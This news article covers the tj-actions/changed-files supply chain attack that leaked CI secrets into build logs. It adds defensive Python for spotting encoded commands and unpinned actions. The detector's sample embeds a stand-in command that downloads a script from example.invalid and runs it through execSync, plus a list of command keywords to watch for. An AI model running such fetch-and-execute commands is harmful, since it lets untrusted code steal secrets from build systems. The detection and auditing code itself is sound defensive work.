
Popular GitHub repo targeted in supply chain attack; over 23000 projects affected


A supply chain attack has targeted tj-actions/changed-files, a popular GitHub Action. Security researchers estimate that the more than 23,000 other GitHub repositories that use it may also have been affected.

The repository was breached at an unknown point before March 14. Once in, the intruders changed the action's code so that, in any project that ran it, it would leak secrets from the CI workflow into that project's build logs. For public repositories those logs are readable by anyone, so API keys and other secrets were exposed for all to see. Private repositories are at lower risk because their logs are visible only to people with access to the repository, but developers should still treat any secret that passed through an affected workflow as compromised and rotate it.

Security firm Sysdig explains in more detail what was changed in the GitHub Action's code. The attackers injected into the action's Node.js code a function carrying base64-encoded commands; when the action ran, those commands executed a Python script on the CI runner. The script collected the project's CI/CD secrets from the Runner.Worker process (the process that holds a job's secrets on a GitHub-hosted runner) and wrote them into the build logs.
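The pattern described above, an encoded string in an action's JavaScript that decodes to a command launching a script, is something a reviewer can hunt for mechanically. The following is an added example, not code from the article, from Sysdig, or from the tj-actions project: a small detector that finds long base64 runs in JavaScript source, decodes them, and flags those that look like commands. Standard library only. SAMPLE_JS is constructed for the demo and is not the real payload; the command it carries and the example.invalid URL are made up.

```python
"""Hunt for base64-encoded commands hidden in an action's JavaScript source.

Added example (not from the article, Sysdig, or the tj-actions project).
SAMPLE_JS below is constructed for the demo and is not the real payload;
the command and the example.invalid URL are made up.
"""
import base64
import re
import string
from typing import List, Optional, Tuple

# Runs of base64 alphabet long enough to hide a command; short tokens such as
# variable names are ignored to keep the noise down.
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

# Substrings that suggest the decoded text is a command rather than, say,
# an embedded image or a plain sentence.
INDICATORS = ("python", "curl", "wget", "bash", "sh -c", "/bin/sh", "eval", "exec(")

# Constructed sample: an encoded downloader command embedded the way an
# obfuscated payload would be, plus two benign long strings that must not trip
# the detector (an encoded sentence and a run of null bytes).
SAMPLE_COMMAND = "curl -s https://example.invalid/x.py -o /tmp/x.py && python3 /tmp/x.py"
SAMPLE_JS = f"""
const payload = "{base64.b64encode(SAMPLE_COMMAND.encode()).decode()}";
const banner = "{base64.b64encode(b'The quick brown fox jumps over the lazy dog').decode()}";
const filler = "{'A' * 44}";
const cmd = Buffer.from(payload, "base64").toString();
require("child_process").execSync(cmd);
"""


def decode_candidate(token: str) -> Optional[str]:
    """Return the decoded text if `token` is valid base64 for printable text, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text or any(ch not in string.printable for ch in text):
        return None
    return text


def find_encoded_commands(js_source: str) -> List[Tuple[str, str]]:
    """Return (encoded, decoded) pairs for base64 blobs that decode to command-like text."""
    hits = []
    for match in B64_RE.finditer(js_source):
        decoded = decode_candidate(match.group(0))
        if decoded and any(ind in decoded.lower() for ind in INDICATORS):
            hits.append((match.group(0), decoded))
    return hits


if __name__ == "__main__":
    for encoded, decoded in find_encoded_commands(SAMPLE_JS):
        print(f"suspicious blob {encoded[:24]}... decodes to: {decoded}")
```

Run it over the `dist/` bundle of any vendored action before bumping its version; a hit is not proof of malice (some legitimate code embeds base64), but a decoded string that invokes curl or python in a file-change action deserves a close look.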

Illustration: Supimol Kumying | Shutterstock

The leaked information can include API keys, passwords, access tokens, and other sensitive data that could be used to take over accounts remotely, send forged or malicious API requests, and more. However, there is so far no evidence that the payload sent the leaked data to an external server; it only wrote it into the build logs.

The threat actor behind the attack is not yet known, but the tj-actions team confirmed that the attack originated from a compromised bot account: the malicious change was pushed using a personal access token (PAT) belonging to the tj-actions-bot account. How the PAT was compromised has not been determined.

Since the attack, Tonye Jack, author of the tj-actions project, has confirmed that the bot account's password has been changed and a passkey added, that its permissions have been reduced to the minimum required, and that all future commits must be signed to ensure contributor integrity.
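The hardening above is on the maintainer's side. Consumers of any third-party action have their own step: reference the action by a full commit SHA rather than a tag or branch, so that a later change to what that tag points at cannot reach the workflow. The following is an added example, not code from the article or the tj-actions project, that scans workflow YAML for `uses:` lines and reports references not pinned to a commit SHA. It goes slightly beyond the article by flagging every unpinned action, not just tj-actions/changed-files. Standard library only; SAMPLE_WORKFLOW is constructed for the demo, and the 40-hex SHA in it is a placeholder, not a real commit.

```python
"""Audit GitHub Actions workflows for third-party actions pulled in by a
mutable ref (tag or branch) instead of a full commit SHA.

Added example, not code from the article or the tj-actions project.
SAMPLE_WORKFLOW is constructed for the demo; its 40-hex SHA is a placeholder.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, List, Optional

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)", re.MULTILINE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


@dataclass
class ActionRef:
    action: str   # owner/repo[/path], e.g. "tj-actions/changed-files"
    ref: str      # tag, branch, or commit SHA after the "@" (empty if absent)
    pinned: bool  # True only for a full 40-hex commit SHA


def parse_uses(workflow_text: str) -> List[ActionRef]:
    """Extract every third-party action reference from one workflow file."""
    refs = []
    for match in USES_RE.finditer(workflow_text):
        spec = match.group(1)
        # Local actions and Docker images are not fetched from a GitHub repo
        # by ref, so the SHA-pinning rule does not apply to them.
        if spec.startswith("./") or spec.startswith("docker://"):
            continue
        action, _, ref = spec.partition("@")
        refs.append(ActionRef(action, ref, bool(SHA_RE.match(ref))))
    return refs


def _same_action(action: str, target: str) -> bool:
    # Compare owner/repo only, so "owner/repo/subdir@v1" still matches "owner/repo".
    return action.split("/")[:2] == target.split("/")[:2]


def find_unpinned(workflow_text: str, only: Optional[str] = None) -> List[ActionRef]:
    """Return references not pinned to a commit SHA, optionally for one action only."""
    return [
        r for r in parse_uses(workflow_text)
        if not r.pinned and (only is None or _same_action(r.action, only))
    ]


def audit_paths(paths: Iterable[Path], only: Optional[str] = None) -> List[str]:
    """Run the check over real workflow files and return human-readable findings."""
    findings = []
    for path in paths:
        for r in find_unpinned(path.read_text(encoding="utf-8"), only):
            findings.append(f"{path}: {r.action}@{r.ref or '<no ref>'} is not pinned to a commit SHA")
    return findings


# Constructed sample workflow (not from any real repository).
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - name: Detect changed files
        uses: tj-actions/changed-files@v45
      - uses: ./.github/actions/local-tool
      - uses: docker://alpine:3.20
      - uses: some-org/some-action@main
"""

if __name__ == "__main__":
    for r in find_unpinned(SAMPLE_WORKFLOW):
        print(f"{r.action}@{r.ref} is not pinned to a commit SHA")
    # Against a checkout: audit_paths(Path(".github/workflows").glob("*.y*ml"))
```

Pinning by SHA is not a substitute for reviewing what the pinned commit contains, and a pinned action still needs bumping when the upstream ships a fix; tools such as Dependabot can keep the SHA current while a human reviews each bump.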


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.
